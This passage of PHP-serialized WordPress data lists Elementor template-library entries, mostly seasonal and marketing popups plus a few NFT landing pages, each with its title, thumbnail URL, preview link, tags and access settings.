2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-3-Small.jpg\";s:12:\"tmpl_created\";i:1647856493;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:89;a:19:{s:4:\"tmpl\";i:1373;s:2:\"id\";i:23347;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-2-Small.jpg\";s:12:\"tmpl_created\";i:1647856891;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:90;a:19:{s:4:\"tmpl\";i:1374;s:2:\"id\";i:23354;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 4\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-4-Small.jpg\";s:12:\"tmpl_created\";i:1647856996;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:91;a:19:{s:4:\"tmpl\";i:1375;s:2:\"id\";i:23394;s:5:\"title\";s:27:\"Classic | CTA | Halloween 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-3-Small.jpg\";s:12:\"tmpl_created\";i:1647857351;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-halloween-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:31:\"[\"cta\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:92;a:19:{s:4:\"tmpl\";i:1376;s:2:\"id\";i:23401;s:5:\"title\";s:33:\"Slide-In | Discount | Halloween 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-2-Small.jpg\";s:12:\"tmpl_created\";i:1647857567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-halloween-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:36:\"[\"Discount\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:93;a:19:{s:4:\"tmpl\";i:1377;s:2:\"id\";i:23407;s:5:\"title\";s:33:\"Slide-In | Discount | Halloween 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-1-Small.jpg\";s:12:\"tmpl_created\";i:1647857814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-halloween-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:36:\"[\"Discount\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:94;a:19:{s:4:\"tmpl\";i:1378;s:2:\"id\";i:23416;s:5:\"title\";s:31:\"Fly-In | Discount | Halloween 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-5-Small.jpg\";s:12:\"tmpl_created\";i:1647858024;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-discount-halloween-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:44:\"[\"Discount\",\"Ecommerce\",\"Halloween\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:95;a:19:{s:4:\"tmpl\";i:1379;s:2:\"id\";i:23422;s:5:\"title\";s:36:\"Classic | Subscription | Halloween 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-4-Small.jpg\";s:12:\"tmpl_created\";i:1647858246;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-halloween-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:48:\"[\"Discount\",\"Ecommerce\",\"Halloween\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:96;a:19:{s:4:\"tmpl\";i:1380;s:2:\"id\";i:23471;s:5:\"title\";s:28:\"Slide-In | CTA | Christmas 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-2-Small.jpg\";s:12:\"tmpl_created\";i:1647859193;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-cta-christmas-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Christmas\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:97;a:19:{s:4:\"tmpl\";i:1381;s:2:\"id\";i:23477;s:5:\"title\";s:28:\"Slide-In | CTA | Christmas 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-4-Small.jpg\";s:12:\"tmpl_created\";i:1647859838;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-cta-christmas-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Christmas\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:98;a:19:{s:4:\"tmpl\";i:1382;s:2:\"id\";i:23483;s:5:\"title\";s:26:\"Fly-In | CTA | Christmas 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-1-Small.jpg\";s:12:\"tmpl_created\";i:1647860157;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/fly-in-cta-christmas-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Christmas\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:99;a:19:{s:4:\"tmpl\";i:1383;s:2:\"id\";i:23489;s:5:\"title\";s:33:\"Slide-In | Discount | Christmas 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-5-Small.jpg\";s:12:\"tmpl_created\";i:1647860302;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-christmas-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:31:\"[\"Christmas\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:100;a:19:{s:4:\"tmpl\";i:1384;s:2:\"id\";i:23496;s:5:\"title\";s:32:\"Classic | Discount | Christmas 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-3-Small.jpg\";s:12:\"tmpl_created\";i:1647860454;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-discount-christmas-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Christmas\",\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:101;a:19:{s:4:\"tmpl\";i:1385;s:2:\"id\";i:23523;s:5:\"title\";s:30:\"Classic | CTA | Valentines Day\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-2-Small.jpg\";s:12:\"tmpl_created\";i:1647860912;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-valentines-day/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"cta\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:102;a:19:{s:4:\"tmpl\";i:1386;s:2:\"id\";i:23529;s:5:\"title\";s:39:\"Hello Bar | Discount | Valentines Day 2\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-1-Small.jpg\";s:12:\"tmpl_created\";i:1647861064;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-discount-valentines-day-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:30:\"[\"Discount\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:103;a:19:{s:4:\"tmpl\";i:1387;s:2:\"id\";i:23536;s:5:\"title\";s:32:\"Classic | CTA | Valentines Day 3\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-3-Small.jpg\";s:12:\"tmpl_created\";i:1647861536;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-cta-valentines-day-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"cta\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:104;a:19:{s:4:\"tmpl\";i:1388;s:2:\"id\";i:23586;s:5:\"title\";s:51:\"Fly-In | Subscribe | Health &#038; Wellness Company\";s:9:\"thumbnail\";s:103:\"https://library.elementor.com/wp-content/uploads/2022/03/35-Subscribe-Health-Wellness-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647862008;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/fly-in-subscribe-health-wellness-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:24:\"[\"Business\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:105;a:19:{s:4:\"tmpl\";i:1389;s:2:\"id\";i:23592;s:5:\"title\";s:34:\"Classic | Subscribe | Tech Company\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/36-Subscribe-Tech-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647866706;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-subscribe-tech-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"Marketing\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:106;a:19:{s:4:\"tmpl\";i:1390;s:2:\"id\";i:23598;s:5:\"title\";s:36:\"Classic | Contact Us | Fight Classes\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/37-Contact-Us-Fight-Classes-Small.jpg\";s:12:\"tmpl_created\";i:1647866869;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-contact-us-fight-classes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:107;a:19:{s:4:\"tmpl\";i:1391;s:2:\"id\";i:23611;s:5:\"title\";s:31:\"Classic | CTA | Mochi Shop Sale\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2022/03/39-Click-Through-Mochi-Shop-Sale-Small.jpg\";s:12:\"tmpl_created\";i:1647867750;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-cta-mochi-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"cta\",\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:108;a:19:{s:4:\"tmpl\";i:1392;s:2:\"id\";i:23618;s:5:\"title\";s:28:\"Classic | CTA | Fashion Shop\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2022/03/40-Click-Through-Fashion-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1647868251;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-cta-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:109;a:19:{s:4:\"tmpl\";i:1393;s:2:\"id\";i:23624;s:5:\"title\";s:29:\"Fly-In | Login | Tech Company\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/41-Login-Tech-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647868704;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/fly-in-login-tech-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:9:\"[\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:110;a:19:{s:4:\"tmpl\";i:1394;s:2:\"id\";i:23630;s:5:\"title\";s:36:\"Fly-In | Verification | Liquor Store\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/42-Verification-Liquor-Store-Small.jpg\";s:12:\"tmpl_created\";i:1647870308;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-verification-liquor-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:16:\"[\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:111;a:19:{s:4:\"tmpl\";i:1395;s:2:\"id\";i:23636;s:5:\"title\";s:39:\"Hello Bar | Subscribe | Online Magazine\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/44-Subscribe-Online-Magazine-Small.jpg\";s:12:\"tmpl_created\";i:1647870465;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-subscribe-online-magazine/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:20:\"[\"Blog\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:112;a:19:{s:4:\"tmpl\";i:1396;s:2:\"id\";i:23642;s:5:\"title\";s:27:\"Fly-In | Login | Health Spa\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/43-Login-Health-Spa-Small.jpg\";s:12:\"tmpl_created\";i:1647872427;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/fly-in-login-health-spa/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Login\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:113;a:19:{s:4:\"tmpl\";i:1397;s:2:\"id\";i:23648;s:5:\"title\";s:33:\"Fly-In | Verification | Wine Shop\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/45-Verification-Wine-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1647872627;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/fly-in-verification-wine-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:16:\"[\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:114;a:19:{s:4:\"tmpl\";i:1421;s:2:\"id\";i:24235;s:5:\"title\";s:24:\"Ladydog Club &#8211; NFT\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/05/Ladydog_Club.jpg\";s:12:\"tmpl_created\";i:1651525072;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/lp/ladydog-club-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:115;a:19:{s:4:\"tmpl\";i:1422;s:2:\"id\";i:24166;s:5:\"title\";s:15:\"Dot &#8211; NFT\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2022/05/Dot-250_280.jpg\";s:12:\"tmpl_created\";i:1651525117;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/lp/dot-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:116;a:19:{s:4:\"tmpl\";i:1423;s:2:\"id\";i:24191;s:5:\"title\";s:28:\"Cosmic Neighbors &#8211; NFT\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Cosmic_Neighbors-250_280.jpg\";s:12:\"tmpl_created\";i:1651525124;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/cosmic-neighbors-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing 